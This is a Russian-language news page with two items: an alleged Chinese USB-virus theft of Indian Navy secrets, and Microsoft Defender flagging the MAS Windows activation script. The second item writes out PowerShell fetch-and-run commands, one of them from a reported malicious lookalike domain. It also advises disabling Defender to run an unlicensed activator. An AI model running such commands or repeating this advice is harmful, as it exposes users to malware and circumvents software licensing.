Индия обвинила китайцев в краже военных секретов с помощью вируса для флэшек

Индия обвинила китайцев в краже военных секретов

По сообщению индийской газеты «The Indian Express», некие китайские хакеры сумели проникнуть в компьютерные системы Восточного военно-морского командования Индии, где сейчас проходит испытание первая атомная подводная лодка индийского флота. По имеющейся информации, новая атака очень похожа на масштабный инцидент 2008 года, после которого в военных сетях США были полностью запрещены USB-флэшки.

В сообщении индийской прессы присутствуют некоторые несостыковки. В частности, сообщается, что вирус был занесен в сеть ВМС Индии с помощью сменных USB-накопителей, хотя их использование строго запрещается в учреждениях военно-морского флота Индии. Тем не менее, как сообщают индийские источники, китайским хакерам удалось внедрить свой вирус и перехватывать информацию, где встречались определенные ключевые слова. В дальнейшем вирус записывал собранную информацию на другие USB-накопители, как только они становились доступны. Таким образом, утечка могла произойти только в том случае, если шпионы или их сообщники имели физический доступ к компьютерам ВМС Индии и их USB-портам, передает soft.mail.ru.

Насколько известно, отправка похищенной информации производилась через подключенные к Интернету компьютеры, когда к ним подключали USB-накопитель, побывавший в защищенных машинах военно-морского ведомства. Расследование показало, что вирус отправлял данные в Китай.

Примечательно, что после аналогичного инцидента в военном ведомстве США использование флэшек и любых USB-накопителей с поддержкой записи было полностью запрещено с 2008 года. В 2009 году этот запрет был частично снят, хотя министерство обороны США выпустило специальную инструкцию, разрешив применение USB-накопителей только «в тщательно контролируемых условиях».

На данный момент ВМС Индии не раскрывают масштабы взлома и его продолжительность. Известно лишь, что уже шесть офицеров флота наказаны за «служебную халатность», которая и создала возможность для выполнения данного взлома.

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru